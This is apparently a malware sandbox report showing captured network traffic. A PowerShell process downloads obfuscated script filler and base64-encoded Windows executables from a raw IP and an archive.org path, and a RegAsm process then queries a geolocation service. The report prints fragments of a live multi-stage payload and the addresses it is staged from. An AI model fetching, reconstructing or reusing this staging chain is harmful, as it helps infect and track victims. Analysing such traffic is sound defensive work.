                        Data Ascii: ilUkvAacernadaaeckK"UiLLAqzaUGcLfzlUspliPld = "LWLUiBOvdhLemfqkhczpKem"dzmWzcbCdbafffpGBLkWKWC = "zCJWAJBhpWGtxptLG
                        Sep 26, 2024 10:33:04.049274921 CEST1236INData Raw: 00 5a 00 4c 00 4c 00 4c 00 69 00 6c 00 57 00 4b 00 51 00 57 00 4e 00 54 00 47 00 74 00 20 00 3d 00 20 00 22 00 43 00 6e 00 57 00 52 00 4c 00 6e 00 6b 00 66 00 67 00 6e 00 57 00 42 00 49 00 66 00 6d 00 57 00 62 00 48 00 4c 00 7a 00 62 00 6c 00 76
                        Data Ascii: ZLLLilWKQWNTGt = "CnWRLnkfgnWBIfmWbHLzblv"WKLeqizrLWctWaKkmNceirm = "AbAzOistdNxlaLJqcqgPIoW"AumNKfQAlgGBRRxHiirGAUN
                        Sep 26, 2024 10:33:04.049307108 CEST1236INData Raw: 00 55 00 69 00 78 00 47 00 4b 00 55 00 6d 00 50 00 47 00 52 00 6e 00 6d 00 57 00 22 00 0d 00 0a 00 55 00 6b 00 63 00 6f 00 66 00 4c 00 75 00 43 00 4b 00 4b 00 53 00 6d 00 6b 00 47 00 6d 00 63 00 4e 00 63 00 52 00 6e 00 55 00 6e 00 4c 00 20 00 3d
                        Data Ascii: UixGKUmPGRnmW"UkcofLuCKKSmkGmcNcRnUnL = "qepbLOWUkbLvfmLWRPALoWW"GcnUWOnpxLLLeHBLmKifWoL = "NuLfxRWjuOfppKZkhuBbWsL"
                        Sep 26, 2024 10:33:04.049341917 CEST896INData Raw: 00 22 00 0d 00 0a 00 4e 00 65 00 62 00 62 00 47 00 4c 00 4e 00 4e 00 71 00 42 00 62 00 52 00 4c 00 4c 00 48 00 4c 00 6b 00 78 00 55 00 4b 00 49 00 6f 00 64 00 20 00 3d 00 20 00 22 00 75 00 42 00 4e 00 48 00 52 00 7a 00 57 00 6c 00 6c 00 50 00 4c
                        Data Ascii: "NebbGLNNqBbRLLHLkxUKIod = "uBNHRzWllPLkCLorRhCfnTi"ppLbLKWAkccOgLGkoipWGCc = "WLLsZizLaiSJnklWGoxpftk"CKhiLKSbpPWW
                        Sep 26, 2024 10:33:04.144798994 CEST1236INData Raw: 00 4c 00 48 00 61 00 42 00 20 00 3d 00 20 00 22 00 6b 00 6a 00 4e 00 4b 00 4b 00 63 00 41 00 6d 00 4a 00 41 00 42 00 47 00 65 00 42 00 68 00 41 00 49 00 4c 00 50 00 5a 00 4b 00 6d 00 57 00 22 00 0d 00 0a 00 4c 00 69 00 52 00 57 00 69 00 69 00 55
                        Data Ascii: LHaB = "kjNKKcAmJABGeBhAILPZKmW"LiRWiiUhLGNhhNWLtoAfpLi = "WULWNRKnCUBduzcWxiBWWco"aeoGqLSeWNUtGALnWNrGLRG = "CuWohmO
                        Sep 26, 2024 10:33:04.144856930 CEST1236INData Raw: 00 47 00 62 00 52 00 66 00 68 00 57 00 54 00 43 00 42 00 41 00 7a 00 55 00 66 00 63 00 4b 00 4c 00 70 00 4c 00 62 00 52 00 50 00 6b 00 20 00 3d 00 20 00 22 00 7a 00 41 00 6b 00 50 00 52 00 4c 00 4c 00 50 00 4c 00 74 00 6e 00 6d 00 52 00 64 00 66
                        Data Ascii: GbRfhWTCBAzUfcKLpLbRPk = "zAkPRLLPLtnmRdfZoWZNiUx"OZcWLOUGLbGfLZuAzBjTBUK = "OitmNqUBcHUhKzKciqfLWeb"ZWZTiehUxBKdtLLf
                        Sep 26, 2024 10:33:04.144913912 CEST1236INData Raw: 00 3d 00 20 00 22 00 74 00 4c 00 4f 00 50 00 50 00 4c 00 68 00 43 00 57 00 64 00 4b 00 61 00 53 00 57 00 4c 00 63 00 74 00 4b 00 4b 00 7a 00 52 00 75 00 57 00 22 00 0d 00 0a 00 55 00 66 00 5a 00 41 00 4e 00 57 00 4c 00 6a 00 5a 00 68 00 7a 00 4b
                        Data Ascii: = "tLOPPLhCWdKaSWLctKKzRuW"UfZANWLjZhzKhNmCicBJfKi = "hZblPTWmpzkvbfLWLAGALLZ"KihztcPOZimLOLfPuNUPZko = "mcsKhmroklJL
                        Sep 26, 2024 10:33:04.144948959 CEST672INData Raw: 00 4b 00 47 00 4a 00 63 00 49 00 4c 00 48 00 57 00 4e 00 6f 00 64 00 4b 00 70 00 57 00 47 00 57 00 4b 00 4b 00 4c 00 20 00 3d 00 20 00 22 00 68 00 61 00 4c 00 49 00 4f 00 66 00 54 00 71 00 72 00 4a 00 69 00 4c 00 4b 00 4c 00 4b 00 70 00 68 00 50
                        Data Ascii: KGJcILHWNodKpWGWKKL = "haLIOfTqrJiLKLKphPLkpiP"NUkPaKRPbLcUdibhQoWGLei = "zWpAUpocoiiLpcLsWBefhLj"uWbPRQkkKtcesmQpQfP
                        Sep 26, 2024 10:33:04.144984961 CEST1236INData Raw: 00 57 00 48 00 6b 00 20 00 3d 00 20 00 22 00 65 00 64 00 65 00 65 00 50 00 6d 00 4c 00 57 00 63 00 64 00 48 00 6b 00 4b 00 6b 00 61 00 6b 00 57 00 4c 00 4c 00 71 00 50 00 48 00 4b 00 22 00 0d 00 0a 00 4e 00 55 00 43 00 4a 00 57 00 6e 00 50 00 4c
                        Data Ascii: WHk = "edeePmLWcdHkKkakWLLqPHK"NUCJWnPLmaPuULrBKGBbLif = "WUimuOtLzPLiGzkqUPnICKu"ARxffkcJUCQhKKjLGGoxLAW = "CkfmWlbA
                        Sep 26, 2024 10:33:04.145025969 CEST1236INData Raw: 00 6e 00 6a 00 22 00 0d 00 0a 00 47 00 4c 00 47 00 5a 00 43 00 6f 00 63 00 49 00 64 00 47 00 68 00 50 00 4c 00 42 00 48 00 6b 00 63 00 49 00 64 00 6b 00 47 00 6e 00 4c 00 20 00 3d 00 20 00 22 00 6d 00 62 00 4c 00 55 00 7a 00 63 00 4c 00 43 00 63
                        Data Ascii: nj"GLGZCocIdGhPLBHkcIdkGnL = "mbLUzcLCcernadaGZZLhtzLqlZhp"LcUiKbcTOmGbKAkqazvioLt = "zKkWOfRcAoiIWetixCUWPpC"iPcdL


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.2249163185.29.10.52803680C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 10:33:11.837939024 CEST74OUTGET /550/RGBV.txt HTTP/1.1
                        Host: 185.29.10.52
                        Connection: Keep-Alive
                        Sep 26, 2024 10:33:12.474556923 CEST1236INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 08:36:11 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                        Last-Modified: Thu, 26 Sep 2024 01:32:10 GMT
                        ETag: "a1000-622fbb5131288"
                        Accept-Ranges: bytes
                        Content-Length: 659456
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/plain
                        Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                        Sep 26, 2024 10:33:12.474611044 CEST1236INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                        Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                        Sep 26, 2024 10:33:12.474647999 CEST448INData Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                        Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                        Sep 26, 2024 10:33:12.474682093 CEST1236INData Raw: 63 44 48 33 51 78 4e 4d 63 44 42 32 77 76 4e 30 62 44 37 32 51 75 4e 63 62 44 31 32 77 73 4e 45 62 44 76 32 51 72 4e 73 61 44 70 32 77 70 4e 55 61 44 6a 32 51 6f 4e 38 5a 44 64 32 77 6d 4e 6b 5a 44 58 32 51 6c 4e 4d 5a 44 52 32 77 6a 4e 30 59 44
                        Data Ascii: cDH3QxNMcDB2wvN0bD72QuNcbD12wsNEbDv2QrNsaDp2wpNUaDj2QoN8ZDd2wmNkZDX2QlNMZDR2wjN0YDL2QiNcYDF2wgNEUD/1QfNsXD51wdNUXDz1QcN8WDt1waNkWDn1QZNMWDh1wXN0VDb1QWNEQD/0QPNsTD50wNNUTDz0QMN8SDt0wKNkSDn0QJNMSDh0wHN0RDb0QGNcRDV0wENERDP0QDNsQDJzg0M8MDMzQyMYMDD
                        Sep 26, 2024 10:33:12.474718094 CEST1236INData Raw: 67 62 4e 77 57 44 71 31 41 61 4e 59 57 44 6b 31 67 59 4e 41 57 44 65 31 41 58 4e 6f 56 44 59 31 67 56 4e 51 56 44 53 31 41 55 4e 34 55 44 4d 31 67 53 4e 67 55 44 47 31 41 52 4e 49 55 44 41 30 67 50 4e 77 54 44 36 30 41 4f 4e 59 54 44 30 30 67 4d
                        Data Ascii: gbNwWDq1AaNYWDk1gYNAWDe1AXNoVDY1gVNQVDS1AUN4UDM1gSNgUDG1ARNIUDA0gPNwTD60AONYTD00gMNATDu0ALNoSDo0gJNQSDi0AIN4RDc0gGNgRDW0AFNIRDQ0gDNwQDK0ACNYQDE0gANAMD+zA/MoPD4zg9MQPDyzA8M4ODszg6MgODmzA5MIODgzg3MwNDazA2MYNDUzg0MANDOzAzMoMDIzgxMQMDCzAgM4LD8yguM
                        Sep 26, 2024 10:33:12.474751949 CEST448INData Raw: 4f 44 70 7a 41 36 4d 63 4f 44 6d 7a 51 35 4d 51 4f 44 6a 7a 67 34 4d 45 4f 44 67 7a 77 33 4d 34 4e 44 64 7a 41 33 4d 73 4e 44 61 7a 51 32 4d 67 4e 44 58 7a 67 31 4d 55 4e 44 55 7a 77 30 4d 49 4e 44 52 7a 41 30 4d 38 4d 44 4f 7a 51 7a 4d 77 41 44
                        Data Ascii: ODpzA6McODmzQ5MQODjzg4MEODgzw3M4NDdzA3MsNDazQ2MgNDXzg1MUNDUzw0MINDRzA0M8MDOzQzMwADzwQMM8CDtwwKMkCDnwQJMMCDhwwHM0BDbwQGMcBDVwwEMEBDPwQDMsADJwwBMUADDwQAAAIAoAUAoA8D//Q/Ps/D5/w9PU/Dz/Q8P8+Dt/w6Pk+Dn/Q5PM+Dh/w3P09Db/Q2Pc9DV/w0PE9DP/QzPs8DJ/wxPU8DD
                        Sep 26, 2024 10:33:12.570207119 CEST1236INData Raw: 59 44 49 32 77 68 4e 59 59 44 46 32 41 68 4e 4d 59 44 41 31 77 66 4e 34 58 44 39 31 41 66 4e 73 58 44 36 31 51 65 4e 67 58 44 33 31 67 64 4e 55 58 44 30 31 77 63 4e 49 58 44 78 31 41 63 4e 38 57 44 75 31 51 62 4e 77 57 44 72 31 67 61 4e 6b 57 44
                        Data Ascii: YDI2whNYYDF2AhNMYDA1wfN4XD91AfNsXD61QeNgXD31gdNUXD01wcNIXDx1AcN8WDu1QbNwWDr1gaNkWDo1wZNYWDl1AZNMWDi1QYNAWDf1gXN0VDc1wWNoVDZ1AWNcVDW1QVNQVDT1gUNEVDQ1wTN4UDN1ATNsUDK1QSNgUDH1gRNUUDE1wQNIUDAAAQAsBQBQCQMsHj4xgdMOHDxxobMwGjpxwZMSGDix4XM0FjaxAWMWFDT
                        Sep 26, 2024 10:33:12.570245028 CEST1236INData Raw: 41 65 4e 4f 58 44 76 31 6f 61 4e 59 57 44 56 31 41 45 4e 77 54 54 36 30 34 4b 4e 59 53 6a 5a 30 6f 46 4e 72 51 6a 48 7a 41 2b 4d 2f 4f 54 74 7a 49 36 4d 34 4e 7a 62 7a 67 32 4d 6d 4d 7a 48 79 55 75 4d 50 4c 44 75 79 45 72 4d 49 4b 44 67 79 4d 6d
                        Data Ascii: AeNOXDv1oaNYWDV1AENwTT604KNYSjZ0oFNrQjHzA+M/OTtzI6M4Nzbzg2MmMzHyUuMPLDuyErMIKDgyMmMVJjRyYQMsDAAAgHAFAAAAAwPU/jp/k3Pn9zT/YkPJ7jA9sePe3T09QcPD2jd98WPo1TY8QOPZzzu8QJPyxzR8MxOvvD47Y9OPrj864JO4jjk3Q9NGfzs3s6NdejV3k0N1czI2srNZVDo1gZNKWTe1wWNhVTI1wAN
                        Sep 26, 2024 10:33:12.570277929 CEST1236INData Raw: 53 44 6a 30 73 48 4e 78 52 7a 5a 30 41 47 4e 52 52 7a 53 30 51 45 4e 35 49 54 76 79 49 72 4d 53 46 6a 2b 78 51 66 4d 75 48 7a 32 78 30 63 4d 46 48 6a 72 78 51 61 4d 5a 47 7a 6b 78 34 59 4d 70 46 44 59 78 77 54 4d 30 41 54 39 77 30 4f 4d 73 43 54
                        Data Ascii: SDj0sHNxRzZ0AGNRRzS0QEN5ITvyIrMSFj+xQfMuHz2x0cMFHjrxQaMZGzkx4YMpFDYxwTM0AT9w0OMsCTow4EMIBAAAAKAEAJA/E+PZ/zy/M8P6+Ts/k6Ph+Tm/44P89Dd/g2Pg9zV/40PG9jP/YzPu8TI/UxPN4zz+MqP35DU+okPE5jP+YjPy4zJ+ghPM0z+98ePd3Tu9oaPc2je9UXPw1DX9EVP80zL9QCP1zz18INPNzjw
                        Sep 26, 2024 10:33:12.570312023 CEST672INData Raw: 34 59 4e 6a 55 54 48 31 63 52 4e 4e 51 54 75 30 55 4b 4e 66 53 54 6a 30 30 45 4e 79 51 44 49 30 38 41 4e 47 4d 44 2f 7a 51 2f 4d 69 50 6a 6d 7a 45 35 4d 2f 4e 44 65 7a 34 67 4d 39 4c 44 2b 79 77 75 4d 6e 4c 44 31 79 67 73 4d 42 4c 6a 71 79 51 70
                        Data Ascii: 4YNjUTH1cRNNQTu0UKNfSTj00ENyQDI08ANGMD/zQ/MiPjmzE5M/NDez4gM9LD+ywuMnLD1ygsMBLjqyQpM+Jzby8jMjIDExkeMTDznw4GMjBDSwQCMIAAAAgLAEADA/YvPf6Tg+MmPe0DN9cSPX0jC8IFPSwDA7M/OovDx7Q5OHuTb7IgOCnzH5owNNYDr2ISNYXzw1kWNWQTCzsyMIID2xcMAAAATAQAIAszY4UxN4fjp3AkN
                        Sep 26, 2024 10:33:12.570382118 CEST1236INData Raw: 59 69 4d 56 4c 44 7a 79 67 72 4d 63 4a 54 55 79 4d 6b 4d 31 49 44 4b 79 49 52 4d 39 48 6a 32 78 4d 63 4d 75 47 6a 6e 78 41 5a 4d 45 47 44 65 78 6f 57 4d 62 46 54 51 77 55 43 41 41 41 41 54 41 4d 41 77 41 41 41 41 2b 73 71 50 72 30 54 6c 39 34 59
                        Data Ascii: YiMVLDzygrMcJTUyMkM1IDKyIRM9Hj2xMcMuGjnxAZMEGDexoWMbFTQwUCAAAATAMAwAAAA+sqPr0Tl94YPf0DF8cPPHzTt8IIP1xza70HAAAAJAMAsAkjs5gaOelDV5ESOUgjZ44FOVhDG48wN1fTf3E3NMYDa1EVNFVDF14QNHQT+0kNN9STs0AKNFSzd00GNjRzR0MDNLMD8zo+McPzuzs6MmODlxcDMTAAAAwFADAKAAAwP


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.2249166178.237.33.50803792C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 10:33:17.545136929 CEST71OUTGET /json.gp HTTP/1.1
                        Host: geoplugin.net
                        Cache-Control: no-cache
                        Sep 26, 2024 10:33:18.153397083 CEST1170INHTTP/1.1 200 OK
                        date: Thu, 26 Sep 2024 08:33:18 GMT
                        server: Apache
                        content-length: 962
                        content-type: application/json; charset=utf-8
                        cache-control: public, max-age=300
                        access-control-allow-origin: *
                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.2249162207.241.227.2404433680C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 08:33:09 UTC109OUTGET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
                        Host: ia600100.us.archive.org
                        Connection: Keep-Alive
                        2024-09-26 08:33:09 UTC606INHTTP/1.1 200 OK
                        Server: nginx/1.24.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 08:33:09 GMT
                        Content-Type: text/plain; charset=utf-8
                        Content-Length: 2823512
                        Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
                        Connection: close
                        ETag: "66e22cba-2b1558"
                        Strict-Transport-Security: max-age=15724800
                        Expires: Thu, 26 Sep 2024 14:33:09 GMT
                        Cache-Control: max-age=21600
                        Access-Control-Allow-Origin: *
                        Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                        Access-Control-Allow-Credentials: true
                        Accept-Ranges: bytes
                        2024-09-26 08:33:09 UTC15778INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 6f 43 42 62 6f 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 59 67 41 41 41 49 41 41 41 41 41 41 41 41 76 6d 55 67 41 41 41 67 41 41 41 41 67 43 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                        Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA
                        2024-09-26 08:33:09 UTC16384INData Raw: 41 41 41 50 34 4d 45 77 42 46 41 67 41 41 41 41 55 41 41 41 41 31 41 41 41 41 4f 41 41 41 41 41 41 41 45 51 4d 52 46 78 45 49 63 35 73 46 41 41 5a 76 63 51 41 41 43 69 41 42 41 41 41 41 66 73 55 49 41 41 52 37 42 51 6b 41 42 44 6e 4a 2f 2f 2f 2f 4a 69 41 41 41 41 41 41 4f 4c 37 2f 2f 2f 38 41 41 4e 30 66 41 41 41 41 49 41 49 41 41 41 42 2b 78 51 67 41 42 48 73 53 43 51 41 45 4f 73 6e 36 2f 2f 38 6d 49 41 41 41 41 41 41 34 76 76 72 2f 2f 78 45 44 62 79 73 41 41 41 6f 57 50 6f 38 41 41 41 41 67 41 51 41 41 41 48 37 46 43 41 41 45 65 77 73 4a 41 41 51 36 6e 66 72 2f 2f 79 59 67 41 51 41 41 41 44 69 53 2b 76 2f 2f 45 67 63 6f 63 41 41 41 43 68 4d 49 49 41 55 41 41 41 42 2b 78 51 67 41 42 48 76 30 43 41 41 45 4f 6e 58 36 2f 2f 38 6d 49 41 59 41 41 41 41 34 61
                        Data Ascii: AAAP4MEwBFAgAAAAUAAAA1AAAAOAAAAAAAEQMRFxEIc5sFAAZvcQAACiABAAAAfsUIAAR7BQkABDnJ////JiAAAAAAOL7///8AAN0fAAAAIAIAAAB+xQgABHsSCQAEOsn6//8mIAAAAAA4vvr//xEDbysAAAoWPo8AAAAgAQAAAH7FCAAEewsJAAQ6nfr//yYgAQAAADiS+v//EgcocAAAChMIIAUAAAB+xQgABHv0CAAEOnX6//8mIAYAAAA4a
                        2024-09-26 08:33:09 UTC16384INData Raw: 2f 2f 2f 77 41 52 42 47 39 49 49 77 41 47 62 33 51 41 41 41 6f 54 42 53 41 46 41 41 41 41 4f 44 48 2f 2f 2f 38 41 4f 4e 73 41 41 41 41 67 43 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 4d 41 45 55 67 41 41 41 41 4f 51 49 41 41 47 34 43 41 41 42 61 41 51 41 41 66 51 41 41 41 4d 73 43 41 41 43 4d 41 51 41 41 46 41 45 41 41 4a 77 44 41 41 43 55 41 41 41 41 41 51 4d 41 41 4c 77 41 41 41 41 57 41 41 41 41 33 41 49 41 41 4d 63 42 41 41 43 6a 41 51 41 41 53 67 49 41 41 41 55 41 41 41 43 62 41 67 41 41 58 67 41 41 41 49 45 42 41 41 41 38 41 51 41 41 61 77 45 41 41 42 30 44 41 41 44 38 41 41 41 41 66 77 49 41 41 4f 30 42 41 41 44 68 41 41 41 41 53 77 45 41 41 44 51 41 41 41 42 46 41 41 41 41 49 51 41 41 41 42 4d 43 41 41 41 34 4e 41 49 41 41 42 45 49 4f 6a 30 44 41
                        Data Ascii: ///wARBG9IIwAGb3QAAAoTBSAFAAAAODH///8AONsAAAAgCAAAADgEAAAA/gwMAEUgAAAAOQIAAG4CAABaAQAAfQAAAMsCAACMAQAAFAEAAJwDAACUAAAAAQMAALwAAAAWAAAA3AIAAMcBAACjAQAASgIAAAUAAACbAgAAXgAAAIEBAAA8AQAAawEAAB0DAAD8AAAAfwIAAO0BAADhAAAASwEAADQAAABFAAAAIQAAABMCAAA4NAIAABEIOj0DA
                        2024-09-26 08:33:09 UTC16384INData Raw: 38 52 43 53 68 31 41 67 41 47 62 7a 49 6a 41 41 59 52 43 57 2f 47 49 67 41 47 4b 48 59 43 41 41 5a 76 4d 69 4d 41 42 69 68 30 41 67 41 47 45 77 38 67 43 51 41 41 41 48 37 46 43 41 41 45 65 38 49 49 41 41 51 36 7a 50 37 2f 2f 79 59 67 44 51 41 41 41 44 6a 42 2f 76 2f 2f 45 51 49 54 41 79 41 49 41 41 41 41 2f 67 34 4b 41 44 69 72 2f 76 2f 2f 4f 42 73 42 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 37 4d 49 41 41 51 36 6c 76 37 2f 2f 79 59 67 41 41 41 41 41 44 69 4c 2f 76 2f 2f 45 51 45 67 70 30 47 63 33 79 41 44 41 41 41 41 59 79 42 63 44 35 4f 49 59 58 37 46 43 41 41 45 65 38 51 49 41 41 52 68 4b 46 51 43 41 41 59 6f 59 77 49 41 42 68 4d 43 49 42 34 41 41 41 41 34 56 2f 37 2f 2f 78 45 48 4f 6c 6f 42 41 41 41 67 43 67 41 41 41 48 37 46 43 41 41 45 65
